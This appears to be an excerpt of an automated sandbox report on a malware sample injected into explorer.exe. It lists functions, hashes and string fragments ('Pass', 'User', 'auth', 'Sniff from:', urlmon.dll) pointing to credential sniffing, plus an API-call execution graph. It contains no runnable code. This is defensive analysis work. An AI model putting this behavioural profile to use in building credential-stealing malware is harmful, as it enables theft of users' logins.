                                            • Instruction Fuzzy Hash: 48918070628B588FDB18EFA8D444BEEB7E1FB98304F40462DE48AD7251EB709949C785
                                            Function 104CECE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4584865812.0000000010430000.00000040.80000000.00040000.00000000.sdmp, Offset: 10430000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_10430000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: UR$2$L: $Pass$User$name$word
                                            • API String ID: 0-2058692283
                                            • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                            • Instruction ID: 5b155b232d5e7ab77dfcbc30edb5c2273a9f2e342227e921946e6bd0297b363f
                                            • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                            • Instruction Fuzzy Hash: 6191D1706187488FDB19DFA8D4847EEB7E1FF98304F40462EE48AD7242EF3495458B89
                                            Function 0E2DD352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4584164490.000000000E220000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E220000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_e220000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $.$e$n$v
                                            • API String ID: 0-1849617553
                                            • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                            • Instruction ID: bd282f01292838d2c037c54990757ad341b3bc71ff0ba091010f188aaf6e8ad0
                                            • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                            • Instruction Fuzzy Hash: 5D717035628B498FD758EFA8C4847AAB7F1FF98304F40062EE44AC7261EB719D458B85
                                            Function 104CE352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4584865812.0000000010430000.00000040.80000000.00040000.00000000.sdmp, Offset: 10430000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_10430000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $.$e$n$v
                                            • API String ID: 0-1849617553
                                            • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                            • Instruction ID: bd541ed9237e27d774ed41f96c32ab506169056cb65658d99bb2793b7e8a08b3
                                            • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                            • Instruction Fuzzy Hash: 3D7192356187498FD758DFA8C4897AAB7F1FF98308F00062EE44AC7221EF75E9458B85
                                            Function 0E2D8C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4584164490.000000000E220000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E220000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_e220000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 2.dl$dll$l32.$ole3$shel
                                            • API String ID: 0-1970020201
                                            • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                            • Instruction ID: d61fe957b42d99b3c58f6f64a758ea6d07271b9cfe5d3adf6a073294cf7dfe4f
                                            • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                            • Instruction Fuzzy Hash: 5B515FB0918B4C8FDB54EFA4C044AEEB7F1FF58301F804A2E959AE7214EF3095458B89
                                            Function 104C9C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4584865812.0000000010430000.00000040.80000000.00040000.00000000.sdmp, Offset: 10430000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_10430000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 2.dl$dll$l32.$ole3$shel
                                            • API String ID: 0-1970020201
                                            • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                            • Instruction ID: 7749d81c609458040a77a29c0d63cda6b061d1639ef32833867b48888b9db61e
                                            • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                            • Instruction Fuzzy Hash: C2515EB4914B4C8FDB54DFA4C0956EEB7F1FF68304F40462EA59AE7214EF30A5418B89
                                            Function 0E2D986F Relevance: 6.4, Strings: 5, Instructions: 157COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4584164490.000000000E220000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E220000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_e220000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4$\$dll$ion.$vers
                                            • API String ID: 0-1610437797
                                            • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                            • Instruction ID: 159eb1208270db843c6708929606ea69f85ff28d90a13b80def9398f8ee4964e
                                            • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                            • Instruction Fuzzy Hash: 9B417035628B4D8FCB75EF2898557EA73E4FB98301F40462E999EC7240EF70D9458B82
                                            Function 104CA86F Relevance: 6.4, Strings: 5, Instructions: 157COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4584865812.0000000010430000.00000040.80000000.00040000.00000000.sdmp, Offset: 10430000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_10430000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4$\$dll$ion.$vers
                                            • API String ID: 0-1610437797
                                            • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                            • Instruction ID: c157109f27d580c289c639b4e5064bae7fec6a97b0d6156a3c3822a4600426c2
                                            • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                            • Instruction Fuzzy Hash: C6417334218B488BCBA9EF6498957EA73E4FB98305F41462E994EC7240DF35D505C782
                                            Function 0E2DB4B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4584164490.000000000E220000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E220000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_e220000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 32.d$cli.$dll$sspi$user
                                            • API String ID: 0-327345718
                                            • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                            • Instruction ID: 5e54c543ed80f2adfad00d81879e0b1a711832f7144bbb4bccfc2aec6e62b487
                                            • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                            • Instruction Fuzzy Hash: F8418D30A29E0D8FCB98EF68C0A97AD73E1FF58300F55056AA80ED7340DA70C9448BC6
                                            Function 104CC4B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4584865812.0000000010430000.00000040.80000000.00040000.00000000.sdmp, Offset: 10430000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_10430000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 32.d$cli.$dll$sspi$user
                                            • API String ID: 0-327345718
                                            • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                            • Instruction ID: d8bd4c0c04a461ddb42a0647376697dc2c665f0cbeed2f2e0acd2127e7ea8b8d
                                            • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                            • Instruction Fuzzy Hash: C4416D74A18F1D9FCB88EF6881D57AD77E1FB68340F41016EE80AD7300DA78E9418B86
                                            Function 0E2D9432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4584164490.000000000E220000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E220000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_e220000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$el32$h$kern
                                            • API String ID: 0-4264704552
                                            • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                            • Instruction ID: 9c1ffde363436b91f36a391cc0574a10e140431650f036e9407cddfcc7521564
                                            • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                            • Instruction Fuzzy Hash: 5C417F7061CB498FD7A9DF2880843AAB7E1FB98304F544A6EA59EC3255DB70C985CB41
                                            Function 104CA432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4584865812.0000000010430000.00000040.80000000.00040000.00000000.sdmp, Offset: 10430000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_10430000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$el32$h$kern
                                            • API String ID: 0-4264704552
                                            • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                            • Instruction ID: 953eed8becf8cf7e4c98b203436331a67649c9ca7c2fd24978ff8c28fc9425a2
                                            • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                            • Instruction Fuzzy Hash: D041B374608B498FD798CF28D0C83AAB7E1FBA8345F104A6E949EC3255DF74D845CB81
                                            Function 0E2E00B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4584164490.000000000E220000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E220000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_e220000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $Snif$f fr$om:
                                            • API String ID: 0-3434893486
                                            • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                            • Instruction ID: 3540b1d1e122ac02cff8744b96e968f02a20f64491fe7403a369268f7d50764c
                                            • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                            • Instruction Fuzzy Hash: 6531D23152CB885FD71AEB28C4846DAB7D0FF84300F904D1EE49BC7751EA70A94ACA42
                                            Function 104D10B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4584865812.0000000010430000.00000040.80000000.00040000.00000000.sdmp, Offset: 10430000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_10430000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $Snif$f fr$om:
                                            • API String ID: 0-3434893486
                                            • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                            • Instruction ID: 0d605a4628ea02fac7562a933268be50c93037ab1b7d9c2c600f7edf7c1232db
                                            • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                            • Instruction Fuzzy Hash: 1331EF7150CB886FC71ADB28C0956DAB7D0FBA4300F50491EE49BC7352EE34A54ACB42
                                            Function 0E2E00C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4584164490.000000000E220000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E220000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_e220000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $Snif$f fr$om:
                                            • API String ID: 0-3434893486
                                            • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                            • Instruction ID: ce23e72317c50c5fd5b4ebc205a107b6e7c26be17ef6c0b6cb39b3dcfad3fbe2
                                            • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                            • Instruction Fuzzy Hash: E031E171528B486FD719EB28C484AEAB7D4FF94300F904D1EE49BC7751EE70E90ACA42
                                            Function 104D10C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4584865812.0000000010430000.00000040.80000000.00040000.00000000.sdmp, Offset: 10430000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_10430000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $Snif$f fr$om:
                                            • API String ID: 0-3434893486
                                            • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                            • Instruction ID: 2e82f17d383173f1c276c8c4ab91b8a296f2413f560f29ed16391938015bd8ee
                                            • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                            • Instruction Fuzzy Hash: AB310F71508B486FC31ADB28C4D5AEAB7D5FBA8300F40491EE49BC3351EE38E50ACB42
                                            Function 0E2DBFC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4584164490.000000000E220000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E220000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_e220000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$chro$hild$me_c
                                            • API String ID: 0-3136806129
                                            • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                            • Instruction ID: 9311cc57ab7112d84c551e424fbeb5a3e9d6644f642e1311cd46825f728fb643
                                            • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                            • Instruction Fuzzy Hash: D6317C74228B184FCB84EF688495BAAB7E1FB98200F841A2D954ECB355DF30C945C752
                                            Function 104CCFC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4584865812.0000000010430000.00000040.80000000.00040000.00000000.sdmp, Offset: 10430000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_10430000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$chro$hild$me_c
                                            • API String ID: 0-3136806129
                                            • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                            • Instruction ID: ea3bb4fa031c23c61a51d09b7e9d7b7178b0b3c8da83878cd21ee879ec7ab21e
                                            • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                            • Instruction Fuzzy Hash: 07316D74118B484FC784EF6984E5BAAB7E1FBA8304F80466DA88ECB314DF34E9058752
                                            Function 0E2DBFBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4584164490.000000000E220000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E220000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_e220000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$chro$hild$me_c
                                            • API String ID: 0-3136806129
                                            • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                            • Instruction ID: 6c36fbd5d76fe93556a7e7a4934f9a5dc41b3033f956c9b60c76e46706b902ac
                                            • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                            • Instruction Fuzzy Hash: C4319C74228B188FCB84EF688495BAAB7E1FF98300F841A2D954ACB355DF30C945CB52
                                            Function 104CCFBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4584865812.0000000010430000.00000040.80000000.00040000.00000000.sdmp, Offset: 10430000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_10430000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$chro$hild$me_c
                                            • API String ID: 0-3136806129
                                            • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                            • Instruction ID: 7ac0696e0993e45637bcc8c77435858c05e81e5355c16bd2034ba5ab46b6d938
                                            • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                            • Instruction Fuzzy Hash: 42317E74118B484FC784EF6884E5BAAB7E1FFA8304F80466DA88ACB354DF34E9058752
                                            Function 0E2DE8C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4584164490.000000000E220000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E220000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_e220000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                            • API String ID: 0-319646191
                                            • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                            • Instruction ID: a11f6d540af0a24d7cf5a07b06d275bf8f10ea79f3acefe469e38dd910cd745b
                                            • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                            • Instruction Fuzzy Hash: D731D131A24A1D8BCB44EFA8C8847EEB7E0FF58214F40062AE45ED7340DF748A45C789
                                            Function 104CF8C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4584865812.0000000010430000.00000040.80000000.00040000.00000000.sdmp, Offset: 10430000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_10430000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                            • API String ID: 0-319646191
                                            • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                            • Instruction ID: 0033aa5f0b68a16e3ce9bd2bf9e737970c40fa237c39960d3a35c0c83959fe05
                                            • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                            • Instruction Fuzzy Hash: F531FF31610B0C8BCB01EFA8C8957EEB7E1FB68209F00422EE44ED7340DE789645C789
                                            Function 0E2DE8BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4584164490.000000000E220000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E220000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_e220000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                            • API String ID: 0-319646191
                                            • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                            • Instruction ID: 8ab8b792612d40a80c1f15e0159e16dafc8d212070b32fd921296127f4130acd
                                            • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                            • Instruction Fuzzy Hash: 7121E670A24A1D8BCB44EFA8C8847ED7BE1FF58204F80462AE45AD7340DF748A05C785
                                            Function 104CF8BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4584865812.0000000010430000.00000040.80000000.00040000.00000000.sdmp, Offset: 10430000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_10430000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                            • API String ID: 0-319646191
                                            • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                            • Instruction ID: 6f1652575372e433ff6747291418e273cb2f0a30619b425250d382577672b06e
                                            • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                            • Instruction Fuzzy Hash: 4721C171610B4C8BCB05EFA8C8957EDBBE1FF68209F40422EE45AD7340DF7896458799
                                            Function 0E2DFE94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4584164490.000000000E220000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E220000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_e220000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .$l$l$t
                                            • API String ID: 0-168566397
                                            • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                            • Instruction ID: 124839c6e3f38bff8eddebab878db3477185c3b6d8335c6c8f7936a745db50c1
                                            • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                            • Instruction Fuzzy Hash: BC215C74A34A1D9BDB04EFA8D4547EDBBF1FB18314F904A2DD049E3B00DB7499558B84
                                            Function 0E2DFE92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4584164490.000000000E220000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E220000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_e220000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .$l$l$t
                                            • API String ID: 0-168566397
                                            • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                            • Instruction ID: 3f231807e4063d1f659554936314839f1c430a8aa6f379653a8ed5b36fab6b05
                                            • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                            • Instruction Fuzzy Hash: 87217C74A24A1E9BDB04EFA8C4447ADBBF1FF18314F904A2ED009E3B00DB7499518B84
                                            Function 104D0E94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4584865812.0000000010430000.00000040.80000000.00040000.00000000.sdmp, Offset: 10430000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_10430000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .$l$l$t
                                            • API String ID: 0-168566397
                                            • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                            • Instruction ID: c6809787adc9b6c31e3db4d87f81abe9bf23909eedb0e87b4267529c725b597f
                                            • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                            • Instruction Fuzzy Hash: 4A215C74A24B0D9BDB44EFA8D0957E9BBF1FB68304F50462EE449D3700DB78A5518B84
                                            Function 104D0E92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4584865812.0000000010430000.00000040.80000000.00040000.00000000.sdmp, Offset: 10430000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_10430000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .$l$l$t
                                            • API String ID: 0-168566397
                                            • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                            • Instruction ID: e32c501ad40fb77fba828f80a1fe274f0c790c084297d5ccffcfa52d0ec9bd24
                                            • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                            • Instruction Fuzzy Hash: BA217C74A24B0D9FDB44EFA8D0947AEBAF1FF68304F50462EE009D3700DB78A5518B84
                                            Function 0E2DFFF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4584164490.000000000E220000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E220000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_e220000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: auth$logi$pass$user
                                            • API String ID: 0-2393853802
                                            • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                            • Instruction ID: 45b453fddbb94fb06d768713d639005fc07a6f6e520928ac7af79fe6ec48c403
                                            • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                            • Instruction Fuzzy Hash: D821CD30624B0D8BCB05DF9998906EEB7E2EF88344F404A1AE40AEB344D7B0DD558BC2
                                            Function 104D0FF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4584865812.0000000010430000.00000040.80000000.00040000.00000000.sdmp, Offset: 10430000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_10430000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: auth$logi$pass$user
                                            • API String ID: 0-2393853802
                                            • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                            • Instruction ID: 49408172d58a1db535ee1583e36e38afa02379d85421fc422d4fdb02cddce828
                                            • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                            • Instruction Fuzzy Hash: 4A21CD30614B4D8BCB45DF9998A16DEB7F1EF88344F004659E80AEB354D7B4E9548BC2

                                            Execution Graph

                                            Execution Coverage:1.6%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:0%
                                            Total number of Nodes:623
                                            Total number of Limit Nodes:68
                                            execution_graph 109790 5ef13d 109793 5eb9d0 109790->109793 109794 5eb9f6 109793->109794 109801 5d9d40 109794->109801 109796 5eba02 109797 5eba26 109796->109797 109809 5d8f30 109796->109809 109847 5ea6b0 109797->109847 109850 5d9c90 109801->109850 109803 5d9d54 109803->109796 109804 5d9d4d 109804->109803 109862 5d9c30 109804->109862 109810 5d8f57 109809->109810 110285 5db1c0 109810->110285 109812 5d8f69 110289 5daf10 109812->110289 109814 5d8f86 109821 5d8f8d 109814->109821 110360 5dae40 LdrLoadDll 109814->110360 109817 5d8ffc 110305 5df410 109817->110305 109819 5d9006 109820 5ebf90 2 API calls 109819->109820 109844 5d90f2 109819->109844 109822 5d902a 109820->109822 109821->109844 110293 5df380 109821->110293 109823 5ebf90 2 API calls 109822->109823 109824 5d903b 109823->109824 109825 5ebf90 2 API calls 109824->109825 109826 5d904c 109825->109826 110317 5dca90 109826->110317 109828 5d9059 109829 5e4a50 8 API calls 109828->109829 109830 5d9066 109829->109830 109831 5e4a50 8 API calls 109830->109831 109832 5d9077 109831->109832 109833 5d90a5 109832->109833 109834 5d9084 109832->109834 109835 5e4a50 8 API calls 109833->109835 110327 5dd620 109834->110327 109843 5d90c1 109835->109843 109838 5d90e9 109841 5d8d00 21 API calls 109838->109841 109840 5d9092 110343 5d8d00 109840->110343 109841->109844 109843->109838 110361 5dd6c0 LdrLoadDll NtClose 